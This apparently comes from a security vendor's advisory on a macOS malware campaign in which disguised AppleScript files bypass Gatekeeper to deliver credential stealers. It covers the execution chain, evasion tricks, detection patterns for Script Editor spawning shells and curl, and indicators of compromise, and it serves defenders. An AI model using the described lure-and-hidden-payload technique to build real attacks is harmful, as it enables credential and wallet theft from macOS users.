top of page

AppleScript-Based Malware Campaign Bypasses Gatekeeper to Deliver macOS Stealers

November 18th, 2025

High

Our Cyber Threat Intelligence Unit has identified a growing macOS malware campaign exploiting AppleScript (.scpt) files to bypass Gatekeeper protections and distribute credential-stealing payloads. Following Apple’s removal of the “right-click and open” Gatekeeper override in August 2024, threat actors have adopted new techniques that leverage trusted tooling such as Script Editor to execute malicious code under the guise of legitimate software updates and documents. These .scpt-based attacks are now delivering commodity stealer families, such as Odyssey Stealer and MacSync Stealer. They are also used in targeted campaigns such as NimDoor, with lures frequently masquerading as Zoom, Microsoft Teams, or Chrome updates. By tricking macOS users into manually running booby-trapped AppleScript files, adversaries are reliably achieving execution and data theft on macOS systems despite native protections. 

Technical Details

  • Attack Vector: Malicious AppleScript (.scpt) files distributed through fake update pages, phishing sites, Telegram channels, and ZIP/DMG archives masquerading as legitimate software or documents.

    • Files often use disguised names such as document.docx.scpt or slides.pptx.scpt, and carry custom icons embedded in the resource fork to mimic Office documents or installers.

  • Severity: High.

  • Execution Chain:

    • Victims download a malicious .scpt file disguised as a legitimate document or software update.

    • By default, double-clicking a .scpt opens it in Script Editor.app, a trusted macOS tool.

    • The script is padded with innocuous-looking comments and long runs of blank lines, pushing the actual payload out of view while instructing the user to click Run or press Command+R.

    • Upon execution, the AppleScript issues do shell script calls (often invoking /bin/bash, /bin/sh, or curl) to download or run additional payloads.

      • Payloads include stealers, backdoors, persistence installers, and reconnaissance scripts.

  • Evasion Techniques:

    • Custom icons and deceptive multi-extension filenames to disguise .scpt files.

    • Delivery via zip or dmg archives preserves icons and extended attributes.

    • Obfuscation using buried shell commands, AppleScript event codes, or minimized/hidden logic structures.

  • Associated Malware Families:

    • Odyssey Stealer: Exfiltrates browser credentials, documents, and cryptocurrency wallet data; commonly delivered via fake Zoom/Teams update chains.

    • MacSync Stealer: AppleScript-delivered successor to mac.c stealer; extracts credentials and wallet data, with newer variants pairing a Go-based backdoor.

    • NimDoor: A persistent macOS backdoor deployed through an AppleScript dropper disguised as a Zoom SDK update; loads C++ and Nim-compiled components for long-term access and data theft.

  • Distribution Channels:

    • Fake Zoom/Teams/Chrome update pages.

    • Phishing and impersonation websites.

    • Telegram distribution channels (noted in NimDoor campaigns).

    • Email-delivered ZIP/DMG archives containing disguised .scpt payloads.

Image by ThisisEngineering

Impact

  • AppleScript-delivered stealers such as Odyssey and MacSync can extract stored credentials, browser data, and potentially cryptocurrency wallet information.

  • Once executed, these AppleScript payloads can:

    • Launch shell commands to download and run additional Mach-O binaries (e.g., NimDoor’s C++ and Nim components).

    • Establish persistence (e.g., LaunchAgents, custom signal-handler logic in NimDoor) and maintain long-lived access.

    • Exfiltrate sensitive data (documents, browser stores, wallets) to remote C2 infrastructure.

  • The .scpt technique abuses Script Editor’s default handling, allowing malicious scripts to execute when users click Run, even for files marked quarantined by Gatekeeper.

  • Traditional AV detections for compiled AppleScript remain inconsistent; several .scpt samples documented in the research still show zero detections on Virus Total.

Detection Method

  • Log & Execution Anomalies:

    • Monitor Script Editor.app or osascript spawning shells or network processes from Downloads, Desktop, or temporary directories.

    • Flag sequences where Script Editor is followed by curl, shell invocations, or access to browser profile paths.

  • AppleScript File Indicators:

    • .scpt, .scptd, or disguised files containing:

      • do shell script or embedded shell commands.

      • AppleScript event codes like sysoexec.

      • Excessive blank lines, comment padding, or misleading prompts.

    • Files with custom icons resembling Zoom, Teams, Chrome, Office documents, or installers.

  • Network & Payload Activity:

    • Monitor outbound connections following .scpt execution to suspicious domains and Ips listed in our IOC section below.

    • Inspect recently downloaded files using xattr -l to identify quarantine attributes and unexpected execution.

Indicators of Compromise

Type 

Indicator 

SHA-256 Hash 

f5b4fec2263950ca5cfac9f9d060bb96f6323fcb908b09eedb7996c107bdcf5a 

SHA-256 Hash 

99cfb160a2453a22cc025fe0afc21d660744205eff2885836d8e543fda50f06d 

SHA-256 Hash 

6149bacfb02eb3db6f95947bc57d89bfb92b90f16f92a61266ea6fbec81d10b7 

SHA-256 Hash 

2e2cedbf1f09208ee7dad6ac5dec96e97bc0c41a31e190bc41e14f2929c05d4c 

SHA-256 Hash 

b489039b502afd8b8267853c4d2cf65f75b76aa1f128f13d332f7d26ffcbd114 

SHA-256 Hash 

14aba88b5f87ab9415bbca855d24abc3f151b819302930897e71e2626e823271 

SHA-256 Hash 

580f6dd3f4cb78f80167a3d980bab3590dca877d78bb4e17360dc50fdbef7692 

SHA-256 Hash 

a7c7d75c33aa809c231f1b22521ae680248986c980b45aa0881e19c19b7b1892 

SHA-256 Hash 

8e897a1e0c3092a7a8f8c3946da6ef23f013dd7633bdea185d15f6ea9c902ef0 

SHA-256 Hash 

24ba8e79bd22ece03fc7cd0b00822a38ecec146dc5c70404476110a4028c9caf 

SHA-256 Hash 

2f99de308882fb9a6686913c4f6cc6654e75eb861d39a9ce33ae23c2d11271ec 

SHA-256 Hash 

f9f9ac24381acad8957724b6aacb0a7fe83d9359c6b7ceded10b2c8e2f4a729b 

SHA-256 Hash 

43e2681212b6324c6087d78e8c30313e199d42e4554e616c6880ed4c4f6bf088 

SHA-256 Hash 

b9c35bccb5ee635269780983265c40169e7c268f73f6e38651cc8efcaf13ed41 

SHA-256 Hash 

7f69f3012e134d1f5084fbb9086697da66a9b0e9240c4e1413777b9e1099aca9 

SHA-256 Hash 

6a95ab1e7a94fb55a1789f5dfb0fb98237ac72d14ae89ac557101a6176826610 

SHA-256 Hash 

03458265a47dd655c7c6eccff7c273618f768f52ecf11db7fd67c857b1eca0cd 

SHA-256 Hash 

9f3a2876f29b336f4372e3c0be26cecaa2966bc5ef5bf2403cb6354ddb87691a 

SHA-256 Hash 

e41efd9eeb08571b4322433df84f81d660ce2fc1ba24134ff14a58a06cd2436b 

SHA-256 Hash 

fbea68ff0dc10f85e859ad09c02c1fea4b85d58e80d8a68af7e93f4a1443b34b 

Domain & IP 

endesway[.]life → 185.93.89[.]62 

Domain & IP 

customizetion[.]com → 192.140.161[.]143 

Domain & IP 

support.ms-live[.]com → 124.132.136[.]17 

Domain & IP 

uk06webzoom[.]us → 114.66.50[.]134 

Domain 

uk04webzoom[.]us 

Domain 

foldgalaxy[.]com 

Domain 

forestnumb[.]top 

Domain 

elbrone[.]com 

Domain 

globalnetman[.]xyz 

Domain 

aubr[.]io 

Domain 

dosmac[.]top 


mix of red, purple, orange, blue bubble shape waves horizontal for cybersecurity and netwo

Recommendations

  • Restrict Script Execution:

    • Change the default application for .scpt files from Script Editor to a non-executable viewer.

    • Restrict user ability to run osascript or Script Editor in high-security environments.

  • User Awareness:

    • Train users not to open .scpt files or run Script Editor prompts originating from downloads or unsolicited archives.

    • Emphasize risks of multi-extension filenames (e.g., *.docx.scpt).

  • Email & File Filtering:

    • Block or quarantine unsolicited .scpt, .zip, and .dmg attachments at email gateways.

  • Network Monitoring:

    • Monitor for outbound connections to domains and IPs listed in this advisory.

    • Alert on Script Editor spawning network processes.

  • Endpoint Monitoring:

    • Detect Script Editor → shell → curl process chains.

    • Inspect downloaded files using xattr -l to verify quarantine status.

  • Backup & Patch Hygiene:

    • Maintain offline or immutable backups.

    • Apply macOS and XProtect updates promptly as Apple refines detection heuristics for AppleScript abuse.

Conclusion

AppleScript-based malware delivery illustrates how macOS threat actors are rapidly adapting to post-Gatekeeper restrictions. By abusing trusted tools like Script Editor, embedding deceptive icons, and crafting convincing multi-extension lures, attackers are achieving consistent user-driven execution with minimal detection. We urge organizations to implement stricter execution policies, improve monitoring of Script Editor activity, and implement targeted filtering for disguised .scpt files to mitigate this evolving threat landscape.

bottom of page